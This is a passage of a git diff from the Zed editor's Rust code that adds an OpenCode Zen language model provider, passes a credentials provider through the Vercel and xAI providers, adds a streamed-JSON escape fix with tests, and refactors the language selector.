Zen"); + +const API_KEY_ENV_VAR_NAME: &str = "OPENCODE_API_KEY"; +static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); + +#[derive(Default, Clone, Debug, PartialEq)] +pub struct OpenCodeSettings { + pub api_url: String, + pub available_models: Vec, +} + +pub struct OpenCodeLanguageModelProvider { + http_client: Arc, + state: Entity, +} + +pub struct State { + api_key_state: ApiKeyState, + credentials_provider: Arc, +} + +impl State { + fn is_authenticated(&self) -> bool { + self.api_key_state.has_key() + } + + fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) + } + + fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) + } +} + +impl OpenCodeLanguageModelProvider { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { + let state = cx.new(|cx| { + cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); + let api_url = Self::api_url(cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + cx.notify(); + }) + .detach(); + State { + api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, + } + }); + + Self { http_client, state } + } + + fn create_language_model(&self, model: opencode::Model) -> Arc { + Arc::new(OpenCodeLanguageModel { + id: LanguageModelId::from(model.id().to_string()), + model, + state: self.state.clone(), + http_client: self.http_client.clone(), + request_limiter: RateLimiter::new(4), + }) + } + + pub fn settings(cx: &App) -> &OpenCodeSettings { + &crate::AllLanguageModelSettings::get_global(cx).opencode + } + + fn api_url(cx: &App) -> SharedString { + let api_url = &Self::settings(cx).api_url; + if api_url.is_empty() { + OPENCODE_API_URL.into() + } else { + SharedString::new(api_url.as_str()) + } + } +} + +impl LanguageModelProviderState for OpenCodeLanguageModelProvider { + type ObservableEntity = State; + + fn observable_entity(&self) -> Option> { + Some(self.state.clone()) + } +} + +impl LanguageModelProvider for OpenCodeLanguageModelProvider { + fn id(&self) -> LanguageModelProviderId { + PROVIDER_ID + } + + fn name(&self) -> LanguageModelProviderName { + PROVIDER_NAME + } + + fn icon(&self) -> IconOrSvg { + IconOrSvg::Icon(IconName::AiOpenCode) + } + + fn default_model(&self, _cx: &App) -> Option> { + Some(self.create_language_model(opencode::Model::default())) + } + + fn default_fast_model(&self, _cx: &App) -> Option> { + Some(self.create_language_model(opencode::Model::default_fast())) + } + + fn provided_models(&self, cx: &App) -> Vec> { + let mut models = BTreeMap::default(); + + for model in opencode::Model::iter() { + if !matches!(model, opencode::Model::Custom { .. }) { + models.insert(model.id().to_string(), model); + } + } + + for model in &Self::settings(cx).available_models { + let protocol = match model.protocol.as_str() { + "anthropic" => ApiProtocol::Anthropic, + "openai_responses" => ApiProtocol::OpenAiResponses, + "openai_chat" => ApiProtocol::OpenAiChat, + "google" => ApiProtocol::Google, + _ => ApiProtocol::OpenAiChat, // default fallback + }; + models.insert( + model.name.clone(), + opencode::Model::Custom { + name: model.name.clone(), + display_name: model.display_name.clone(), + max_tokens: model.max_tokens, + max_output_tokens: model.max_output_tokens, + protocol, + }, + ); + } + + models + .into_values() + .map(|model| self.create_language_model(model)) + .collect() + } + + fn is_authenticated(&self, cx: &App) -> bool { + self.state.read(cx).is_authenticated() + } + + fn authenticate(&self, cx: &mut App) -> Task> { + self.state.update(cx, |state, cx| state.authenticate(cx)) + } + + fn configuration_view( + &self, + _target_agent: language_model::ConfigurationViewTargetAgent, + window: &mut Window, + cx: &mut App, + ) -> AnyView { + cx.new(|cx| ConfigurationView::new(self.state.clone(), window, cx)) + .into() + } + + fn reset_credentials(&self, cx: &mut App) -> Task> { + self.state + .update(cx, |state, cx| state.set_api_key(None, cx)) + } +} + +pub struct OpenCodeLanguageModel { + id: LanguageModelId, + model: opencode::Model, + state: Entity, + http_client: Arc, + request_limiter: RateLimiter, +} + +impl OpenCodeLanguageModel { + /// Returns the base API URL (e.g., "https://opencode.ai/zen"). + fn base_api_url(&self, cx: &AsyncApp) -> SharedString { + self.state + .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx)) + } + + fn api_key(&self, cx: &AsyncApp) -> Option> { + self.state.read_with(cx, |state, cx| { + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + state.api_key_state.key(&api_url) + }) + } + + fn stream_anthropic( + &self, + request: anthropic::Request, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result< + futures::stream::BoxStream< + 'static, + Result, + >, + LanguageModelCompletionError, + >, + > { + let http_client = self.http_client.clone(); + // Anthropic crate appends /v1/messages to api_url + let api_url = self.base_api_url(cx); + let api_key = self.api_key(cx); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + provider: PROVIDER_NAME, + }); + }; + let request = anthropic::stream_completion( + http_client.as_ref(), + &api_url, + &api_key, + request, + None, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } + + fn stream_openai_chat( + &self, + request: open_ai::Request, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result>>, + > { + let http_client = self.http_client.clone(); + // OpenAI crate appends /chat/completions to api_url, so we pass base + "/v1" + let base_url = self.base_api_url(cx); + let api_url: SharedString = format!("{base_url}/v1").into(); + let api_key = self.api_key(cx); + let provider_name = PROVIDER_NAME.0.to_string(); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + provider: PROVIDER_NAME, + }); + }; + let request = open_ai::stream_completion( + http_client.as_ref(), + &provider_name, + &api_url, + &api_key, + request, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } + + fn stream_openai_response( + &self, + request: open_ai::responses::Request, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result>>, + > { + let http_client = self.http_client.clone(); + // Responses crate appends /responses to api_url, so we pass base + "/v1" + let base_url = self.base_api_url(cx); + let api_url: SharedString = format!("{base_url}/v1").into(); + let api_key = self.api_key(cx); + let provider_name = PROVIDER_NAME.0.to_string(); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + provider: PROVIDER_NAME, + }); + }; + let request = open_ai::responses::stream_response( + http_client.as_ref(), + &provider_name, + &api_url, + &api_key, + request, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } + + fn stream_google_zen( + &self, + request: google_ai::GenerateContentRequest, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result>>, + > { + let http_client = self.http_client.clone(); + let api_url = self.base_api_url(cx); + let api_key = self.api_key(cx); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + provider: PROVIDER_NAME, + }); + }; + let request = opencode::stream_generate_content_zen( + http_client.as_ref(), + &api_url, + &api_key, + request, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } +} + +impl LanguageModel for OpenCodeLanguageModel { + fn id(&self) -> LanguageModelId { + self.id.clone() + } + + fn name(&self) -> LanguageModelName { + LanguageModelName::from(self.model.display_name().to_string()) + } + + fn provider_id(&self) -> LanguageModelProviderId { + PROVIDER_ID + } + + fn provider_name(&self) -> LanguageModelProviderName { + PROVIDER_NAME + } + + fn supports_tools(&self) -> bool { + self.model.supports_tools() + } + + fn supports_images(&self) -> bool { + self.model.supports_images() + } + + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { + match choice { + LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true, + LanguageModelToolChoice::None => { + // Google models don't support None tool choice + self.model.protocol() != ApiProtocol::Google + } + } + } + + fn telemetry_id(&self) -> String { + format!("opencode/{}", self.model.id()) + } + + fn max_token_count(&self) -> u64 { + self.model.max_token_count() + } + + fn max_output_tokens(&self) -> Option { + self.model.max_output_tokens() + } + + fn count_tokens( + &self, + request: LanguageModelRequest, + cx: &App, + ) -> BoxFuture<'static, Result> { + cx.background_spawn(async move { + let messages = request + .messages + .into_iter() + .map(|message| tiktoken_rs::ChatCompletionRequestMessage { + role: match message.role { + Role::User => "user".into(), + Role::Assistant => "assistant".into(), + Role::System => "system".into(), + }, + content: Some(message.string_contents()), + name: None, + function_call: None, + }) + .collect::>(); + + tiktoken_rs::num_tokens_from_messages("gpt-4o", &messages).map(|tokens| tokens as u64) + }) + .boxed() + } + + fn stream_completion( + &self, + request: LanguageModelRequest, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result< + futures::stream::BoxStream< + 'static, + Result, + >, + LanguageModelCompletionError, + >, + > { + match self.model.protocol() { + ApiProtocol::Anthropic => { + let anthropic_request = into_anthropic( + request, + self.model.id().to_string(), + 1.0, + self.model.max_output_tokens().unwrap_or(8192), + anthropic::AnthropicModelMode::Default, + ); + let stream = self.stream_anthropic(anthropic_request, cx); + async move { + let mapper = AnthropicEventMapper::new(); + Ok(mapper.map_stream(stream.await?).boxed()) + } + .boxed() + } + ApiProtocol::OpenAiChat => { + let openai_request = into_open_ai( + request, + self.model.id(), + false, + false, + self.model.max_output_tokens(), + None, + ); + let stream = self.stream_openai_chat(openai_request, cx); + async move { + let mapper = OpenAiEventMapper::new(); + Ok(mapper.map_stream(stream.await?).boxed()) + } + .boxed() + } + ApiProtocol::OpenAiResponses => { + let response_request = into_open_ai_response( + request, + self.model.id(), + false, + false, + self.model.max_output_tokens(), + None, + ); + let stream = self.stream_openai_response(response_request, cx); + async move { + let mapper = OpenAiResponseEventMapper::new(); + Ok(mapper.map_stream(stream.await?).boxed()) + } + .boxed() + } + ApiProtocol::Google => { + let google_request = into_google( + request, + self.model.id().to_string(), + google_ai::GoogleModelMode::Default, + ); + let stream = self.stream_google_zen(google_request, cx); + async move { + let mapper = GoogleEventMapper::new(); + Ok(mapper.map_stream(stream.await?.boxed()).boxed()) + } + .boxed() + } + } + } +} + +struct ConfigurationView { + api_key_editor: Entity, + state: Entity, + load_credentials_task: Option>, +} + +impl ConfigurationView { + fn new(state: Entity, window: &mut Window, cx: &mut Context) -> Self { + let api_key_editor = cx.new(|cx| { + InputField::new(window, cx, "sk-00000000000000000000000000000000").label("API key") + }); + + cx.observe(&state, |_, _, cx| { + cx.notify(); + }) + .detach(); + + let load_credentials_task = Some(cx.spawn_in(window, { + let state = state.clone(); + async move |this, cx| { + if let Some(task) = Some(state.update(cx, |state, cx| state.authenticate(cx))) { + let _ = task.await; + } + this.update(cx, |this, cx| { + this.load_credentials_task = None; + cx.notify(); + }) + .log_err(); + } + })); + + Self { + api_key_editor, + state, + load_credentials_task, + } + } + + fn save_api_key(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { + let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string(); + if api_key.is_empty() { + return; + } + + self.api_key_editor + .update(cx, |editor, cx| editor.set_text("", window, cx)); + + let state = self.state.clone(); + cx.spawn_in(window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(Some(api_key), cx)) + .await + }) + .detach_and_log_err(cx); + } + + fn reset_api_key(&mut self, window: &mut Window, cx: &mut Context) { + self.api_key_editor + .update(cx, |editor, cx| editor.set_text("", window, cx)); + + let state = self.state.clone(); + cx.spawn_in(window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(None, cx)) + .await + }) + .detach_and_log_err(cx); + } + + fn should_render_editor(&self, cx: &mut Context) -> bool { + !self.state.read(cx).is_authenticated() + } +} + +impl Render for ConfigurationView { + fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { + let env_var_set = self.state.read(cx).api_key_state.is_from_env_var(); + let configured_card_label = if env_var_set { + format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable") + } else { + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + if api_url == OPENCODE_API_URL { + "API key configured".to_string() + } else { + format!("API key configured for {}", api_url) + } + }; + + let api_key_section = if self.should_render_editor(cx) { + v_flex() + .on_action(cx.listener(Self::save_api_key)) + .child(Label::new( + "To use OpenCode Zen models in Zed, you need an API key:", + )) + .child( + List::new() + .child( + ListBulletItem::new("") + .child(Label::new("Sign in and get your key at")) + .child(ButtonLink::new( + "OpenCode Zen Console", + "https://opencode.ai/zen", + )), + ) + .child(ListBulletItem::new( + "Paste your API key below and hit enter to start using OpenCode Zen", + )), + ) + .child(self.api_key_editor.clone()) + .child( + Label::new(format!( + "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed." + )) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .into_any_element() + } else { + ConfiguredApiCard::new(configured_card_label) + .disabled(env_var_set) + .when(env_var_set, |this| { + this.tooltip_label(format!( + "To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable." + )) + }) + .on_click(cx.listener(|this, _, window, cx| this.reset_api_key(window, cx))) + .into_any_element() + }; + + if self.load_credentials_task.is_some() { + div().child(Label::new("Loading credentials...")).into_any() + } else { + v_flex().size_full().child(api_key_section).into_any() + } + } +} diff --git a/crates/language_models/src/provider/util.rs b/crates/language_models/src/provider/util.rs index 6b1cf7afbb7e3a068dabbc6787c322649d50393d..76a02b6de40a3e36c7c506f11a6f6d34d2aaca3e 100644 --- a/crates/language_models/src/provider/util.rs +++ b/crates/language_models/src/provider/util.rs @@ -11,3 +11,99 @@ pub fn parse_tool_arguments(arguments: &str) -> Result String { + let json = strip_trailing_incomplete_escape(partial_json); + partial_json_fixer::fix_json(json) +} + +fn strip_trailing_incomplete_escape(json: &str) -> &str { + let trailing_backslashes = json + .as_bytes() + .iter() + .rev() + .take_while(|&&b| b == b'\\') + .count(); + if trailing_backslashes % 2 == 1 { + &json[..json.len() - 1] + } else { + json + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_fix_streamed_json_strips_incomplete_escape() { + // Trailing `\` inside a string — incomplete escape sequence + let fixed = fix_streamed_json(r#"{"text": "hello\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello"); + } + + #[test] + fn test_fix_streamed_json_preserves_complete_escape() { + // `\\` is a complete escape (literal backslash) + let fixed = fix_streamed_json(r#"{"text": "hello\\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello\\"); + } + + #[test] + fn test_fix_streamed_json_strips_escape_after_complete_escape() { + // `\\\` = complete `\\` (literal backslash) + incomplete `\` + let fixed = fix_streamed_json(r#"{"text": "hello\\\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello\\"); + } + + #[test] + fn test_fix_streamed_json_no_escape_at_end() { + let fixed = fix_streamed_json(r#"{"text": "hello"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello"); + } + + #[test] + fn test_fix_streamed_json_newline_escape_boundary() { + // Simulates a stream boundary landing between `\` and `n` + let fixed = fix_streamed_json(r#"{"text": "line1\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "line1"); + + // Next chunk completes the escape + let fixed = fix_streamed_json(r#"{"text": "line1\nline2"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "line1\nline2"); + } + + #[test] + fn test_fix_streamed_json_incremental_delta_correctness() { + // This is the actual scenario that causes the bug: + // chunk 1 ends mid-escape, chunk 2 completes it. + let chunk1 = r#"{"replacement_text": "fn foo() {\"#; + let fixed1 = fix_streamed_json(chunk1); + let parsed1: serde_json::Value = serde_json::from_str(&fixed1).expect("valid json"); + let text1 = parsed1["replacement_text"].as_str().expect("string"); + assert_eq!(text1, "fn foo() {"); + + let chunk2 = r#"{"replacement_text": "fn foo() {\n return bar;\n}"}"#; + let fixed2 = fix_streamed_json(chunk2); + let parsed2: serde_json::Value = serde_json::from_str(&fixed2).expect("valid json"); + let text2 = parsed2["replacement_text"].as_str().expect("string"); + assert_eq!(text2, "fn foo() {\n return bar;\n}"); + + // The delta should be the newline + rest, with no spurious backslash + let delta = &text2[text1.len()..]; + assert_eq!(delta, "\n return bar;\n}"); + } +} diff --git a/crates/language_models/src/provider/vercel.rs b/crates/language_models/src/provider/vercel.rs index 3b324e46927f5864d83a5e4b74c46f5e39e8ab3a..cedbc9c3cb988375b90864ceb23a3b14fc50abdd 100644 --- a/crates/language_models/src/provider/vercel.rs +++ b/crates/language_models/src/provider/vercel.rs @@ -1,5 +1,6 @@ use anyhow::Result; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::HttpClient; @@ -38,6 +39,7 @@ pub struct VercelLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -46,30 +48,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl VercelLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -248,6 +271,10 @@ impl LanguageModel for VercelLanguageModel { true } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { match choice { LanguageModelToolChoice::Auto diff --git a/crates/language_models/src/provider/vercel_ai_gateway.rs b/crates/language_models/src/provider/vercel_ai_gateway.rs index 69c54e624b9e7289abaefbe7ab654d73df385b62..66767edd809531b4b020263654922d742a1a04be 100644 --- a/crates/language_models/src/provider/vercel_ai_gateway.rs +++ b/crates/language_models/src/provider/vercel_ai_gateway.rs @@ -1,5 +1,6 @@ use anyhow::Result; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{AsyncReadExt, FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest, http}; @@ -41,6 +42,7 @@ pub struct VercelAiGatewayLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, http_client: Arc, available_models: Vec, fetch_models_task: Option>>, @@ -52,16 +54,26 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = VercelAiGatewayLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = VercelAiGatewayLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.spawn(async move |this, cx| { let result = task.await; @@ -100,7 +112,11 @@ impl State { } impl VercelAiGatewayLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::({ let mut last_settings = VercelAiGatewayLanguageModelProvider::settings(cx).clone(); @@ -116,6 +132,7 @@ impl VercelAiGatewayLanguageModelProvider { .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, http_client: http_client.clone(), available_models: Vec::new(), fetch_models_task: None, @@ -385,6 +402,10 @@ impl LanguageModel for VercelAiGatewayLanguageModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_split_token_display(&self) -> bool { true } diff --git a/crates/language_models/src/provider/x_ai.rs b/crates/language_models/src/provider/x_ai.rs index 06564224dea9621d594e5cf3f4a84093f1620446..88189864c7b4b650a24afb2b872c1d6105cf9782 100644 --- a/crates/language_models/src/provider/x_ai.rs +++ b/crates/language_models/src/provider/x_ai.rs @@ -1,5 +1,6 @@ use anyhow::Result; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, Window}; use http_client::HttpClient; @@ -39,6 +40,7 @@ pub struct XAiLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -47,30 +49,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = XAiLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = XAiLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl XAiLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -257,6 +280,10 @@ impl LanguageModel for XAiLanguageModel { self.model.supports_images() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { match choice { LanguageModelToolChoice::Auto @@ -265,8 +292,7 @@ impl LanguageModel for XAiLanguageModel { } } fn tool_input_format(&self) -> LanguageModelToolSchemaFormat { - let model_id = self.model.id().trim().to_lowercase(); - if model_id.eq(x_ai::Model::Grok4.id()) || model_id.eq(x_ai::Model::GrokCodeFast1.id()) { + if self.model.requires_json_schema_subset() { LanguageModelToolSchemaFormat::JsonSchemaSubset } else { LanguageModelToolSchemaFormat::JsonSchema @@ -285,6 +311,10 @@ impl LanguageModel for XAiLanguageModel { self.model.max_output_tokens() } + fn supports_split_token_display(&self) -> bool { + true + } + fn count_tokens( &self, request: LanguageModelRequest, diff --git a/crates/language_models/src/settings.rs b/crates/language_models/src/settings.rs index 7466a337f636abcd8ad70343dfd64a825a7fb6a7..f60d4c6cb498519133098f6306746c5a59e7a1d9 100644 --- a/crates/language_models/src/settings.rs +++ b/crates/language_models/src/settings.rs @@ -8,7 +8,8 @@ use crate::provider::{ deepseek::DeepSeekSettings, google::GoogleSettings, lmstudio::LmStudioSettings, mistral::MistralSettings, ollama::OllamaSettings, open_ai::OpenAiSettings, open_ai_compatible::OpenAiCompatibleSettings, open_router::OpenRouterSettings, - vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, x_ai::XAiSettings, + opencode::OpenCodeSettings, vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, + x_ai::XAiSettings, }; #[derive(Debug, RegisterSetting)] @@ -20,6 +21,7 @@ pub struct AllLanguageModelSettings { pub lmstudio: LmStudioSettings, pub mistral: MistralSettings, pub ollama: OllamaSettings, + pub opencode: OpenCodeSettings, pub open_router: OpenRouterSettings, pub openai: OpenAiSettings, pub openai_compatible: HashMap, OpenAiCompatibleSettings>, @@ -41,6 +43,7 @@ impl settings::Settings for AllLanguageModelSettings { let lmstudio = language_models.lmstudio.unwrap(); let mistral = language_models.mistral.unwrap(); let ollama = language_models.ollama.unwrap(); + let opencode = language_models.opencode.unwrap(); let open_router = language_models.open_router.unwrap(); let openai = language_models.openai.unwrap(); let openai_compatible = language_models.openai_compatible.unwrap(); @@ -85,6 +88,10 @@ impl settings::Settings for AllLanguageModelSettings { available_models: ollama.available_models.unwrap_or_default(), context_window: ollama.context_window, }, + opencode: OpenCodeSettings { + api_url: opencode.api_url.unwrap(), + available_models: opencode.available_models.unwrap_or_default(), + }, open_router: OpenRouterSettings { api_url: open_router.api_url.unwrap(), available_models: open_router.available_models.unwrap_or_default(), diff --git a/crates/language_onboarding/Cargo.toml b/crates/language_onboarding/Cargo.toml index 38cf8a604a87f403e2d2720be6a2ba69a61e7484..1ab0a75fc3f726de5ec81c18f5b7ae5c136caeea 100644 --- a/crates/language_onboarding/Cargo.toml +++ b/crates/language_onboarding/Cargo.toml @@ -21,9 +21,3 @@ gpui.workspace = true project.workspace = true ui.workspace = true workspace.workspace = true - -# Uncomment other workspace dependencies as needed -# assistant.workspace = true -# client.workspace = true -# project.workspace = true -# settings.workspace = true diff --git a/crates/language_onboarding/src/python.rs b/crates/language_onboarding/src/python.rs index e715cb7c806f417980a93a62210c72ca8529fcb5..64b6502327f71e7a68f40b5a7690f308ecbf8c40 100644 --- a/crates/language_onboarding/src/python.rs +++ b/crates/language_onboarding/src/python.rs @@ -23,7 +23,7 @@ impl BasedPyrightBanner { this.have_basedpyright = true; } }); - let dismissed = Self::dismissed(); + let dismissed = Self::dismissed(cx); Self { dismissed, have_basedpyright: false, @@ -56,10 +56,8 @@ impl Render for BasedPyrightBanner { .gap_0p5() .child( Button::new("learn-more", "Learn More") - .icon(IconName::ArrowUpRight) .label_size(LabelSize::Small) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::XSmall).color(Color::Muted)) .on_click(|_, _, cx| { cx.open_url("https://zed.dev/docs/languages/python") }), diff --git a/crates/language_selector/src/active_buffer_language.rs b/crates/language_selector/src/active_buffer_language.rs index c75c3954cc6590c2e0cb4326c073ed004eaac280..1f280282af933094cf46cd9e7ab790efd07b8a12 100644 --- a/crates/language_selector/src/active_buffer_language.rs +++ b/crates/language_selector/src/active_buffer_language.rs @@ -29,7 +29,7 @@ impl ActiveBufferLanguage { self.active_language = Some(None); let editor = editor.read(cx); - if let Some((_, buffer, _)) = editor.active_excerpt(cx) + if let Some(buffer) = editor.active_buffer(cx) && let Some(language) = buffer.read(cx).language() { self.active_language = Some(Some(language.name())); diff --git a/crates/language_selector/src/language_selector.rs b/crates/language_selector/src/language_selector.rs index 17a39d4979a1321a4b0e612bff228f186098babf..70a03514f45371d58d0a8ee0a14eb87565d3a514 100644 --- a/crates/language_selector/src/language_selector.rs +++ b/crates/language_selector/src/language_selector.rs @@ -51,11 +51,11 @@ impl LanguageSelector { cx: &mut Context, ) -> Option<()> { let registry = workspace.app_state().languages.clone(); - let (_, buffer, _) = workspace + let buffer = workspace .active_item(cx)? .act_as::(cx)? .read(cx) - .active_excerpt(cx)?; + .active_buffer(cx)?; let project = workspace.project().clone(); workspace.toggle_modal(window, cx, move |window, cx| { @@ -280,20 +280,28 @@ impl PickerDelegate for LanguageSelectorDelegate { }; this.update_in(cx, |this, window, cx| { - let delegate = &mut this.delegate; - delegate.matches = matches; - delegate.selected_index = delegate - .selected_index - .min(delegate.matches.len().saturating_sub(1)); - - if query_is_empty { - if let Some(index) = delegate - .current_language_candidate_index - .and_then(|ci| delegate.matches.iter().position(|m| m.candidate_id == ci)) - { - this.set_selected_index(index, None, false, window, cx); - } + if matches.is_empty() { + this.delegate.matches = matches; + this.delegate.selected_index = 0; + cx.notify(); + return; } + + let selected_index = if query_is_empty { + this.delegate + .current_language_candidate_index + .and_then(|current_language_candidate_index| { + matches.iter().position(|mat| { + mat.candidate_id == current_language_candidate_index + }) + }) + .unwrap_or(0) + } else { + 0 + }; + + this.delegate.matches = matches; + this.set_selected_index(selected_index, None, false, window, cx); cx.notify(); }) .log_err(); @@ -345,28 +353,25 @@ mod tests { fn register_test_languages(project: &Entity, cx: &mut VisualTestContext) { project.read_with(cx, |project, _| { let language_registry = 